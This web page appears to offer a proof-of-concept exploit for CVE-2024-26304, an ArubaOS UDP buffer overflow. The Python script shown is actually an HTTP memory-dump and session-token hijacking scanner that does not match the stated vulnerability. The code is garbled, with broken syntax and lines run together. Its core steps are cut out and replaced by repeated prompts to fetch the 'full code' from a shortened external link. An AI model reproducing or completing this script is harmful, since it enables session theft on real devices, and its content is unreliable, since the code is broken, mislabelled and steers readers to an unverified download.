ArubaOS Remote Code Execution Vulnerability (CVE-2024-26304)
descriptive
A buffer overflow vulnerability exists in the underlying L2/L3 management service that could lead to unauthenticated remote code execution by sending specially crafted packets destined for PAPI (Aruba Access Point Management Protocol) UDP port (8211). Successful exploitation of this vulnerability could result in the execution of arbitrary code on the underlying operating system as a privileged user.
poc
import re
import sys
import hexdump
import argparse
import requestsfrom rich.console.import Console
from urllib.parse import urlparse
from alive_progress import alive_bar
from typing import List, Tuple, Optional, TextIO
from concurrent.futures import ThreadPoolExecutor, as_completedwarnings = requests.packages.urllib3
warnings.disable_warnings(warnings.exceptions.InsecureRequestWarning)class ArubaRCE.
def __init__(self).
self.console = Console()
self.parser = argparse.ArgumentParser(description='ArubaRCE')
self.setup_arguments()
self.results: List[Tuple[str, str]] = []
self.output_file: Optional[TextIO] = None
if self.args.output:
self.output_file = open(self.args.output, 'w')def setup_arguments(self) -> None.
self.parser.add_argument('-u', '-url', help='The ArubaRCE / Gateway target (e.g., https://192.168.1.200)')
self.parser.add_argument('-f', '-file', help='File containing a list of target URLs (one URL per line)')
self.parser.add_argument('-o', '-output', help='File to save the output results')
self.parser.add_argument('-v', '-verbose', action='store_ true', help='Enable verbose mode')
self.parser.add_argument('-only-valid', action='store_true', help= 'Only show results with valid sessions')
self.args = self.parser.parse_args()def print_results(self, header: str, result: str) -> None.
if self.args.only_valid and "[+]" not in header:
returnformatted_msg = f"{header} {result}"
self.console.print(formatted_msg, style="white")
if self.output_file.
self.output_file.write(result + '\n')def normalize_url(self, url: str) -> str.
if not url.startswith("http://") and not url.startswith("https://")::
url = f "https://{url}"parsed_url = urlparse(url)
normalized_url = f"{parsed_url.scheme}://{parsed_url.netloc}"
return normalized_urldef dump_memory(self, url: str) -> None.
full_url = self.normalize_url(url)
headers = {
# [REDACTED. Get full code here https://t.ly/C1-D1]
print("Headers:", headers)
}try.
r = requests.get(
f"{full_url}/oauth/redacted", # [REDACTED. Get full code here https://t.ly/C1-D1]
headers=headers,
verify=False,
timeout=10
)
content_bytes = r.contentif r.status_code == 200 and content_bytes.
# [REDACTED. Get full code here https://t.ly/C1-D1]
print("Content bytes:", content_bytes)except Exception as e.
print("Error:", e)def clean_bytes(self, data: bytes) -> bytes.
# [REDACTED. Get full code here https://t.ly/C1-D1]
print("Cleaning bytes...")def find_session_tokens(self, content_bytes: bytes) -> List[str].
# [REDACTED. Get full code here https://t.ly/C1-D1]
print("Finding session tokens...")def test_session_cookie(self, url: str, session_token: str) -> bool.
headers = {
"Cookie": f"[REDACTED. Get full code here https://t.ly/C1-D1]={session_token}"
}
try.
r = requests.post(
# [REDACTED. Get full code here https://t.ly/C1-D1]
)
# [REDACTED. Get full code here https://t.ly/C1-D1]
print("Session cookie test result:", result)
return resultexcept Exception as e.
print("Error:", e)
return Falsedef run(self) -> None.
if self.args.url.
# [REDACTED. Get full code here https://t.ly/C1-D1]
for header, result in self.results:
self.print_results(header, result)
elif self.args.file.
# [REDACTED. Get full code here https://t.ly/C1-D1]
pass # Placeholder for code execution for file processing
else.
self.console.print("[bold red][-][/bold red] URL or File must be provided.", style="white")
sys.exit(1)if self.output_file.
self.output_file.close()if __name__ == "__main__".
getRCE = ArubaRCE()
getRCE.run()
Source of vulnerability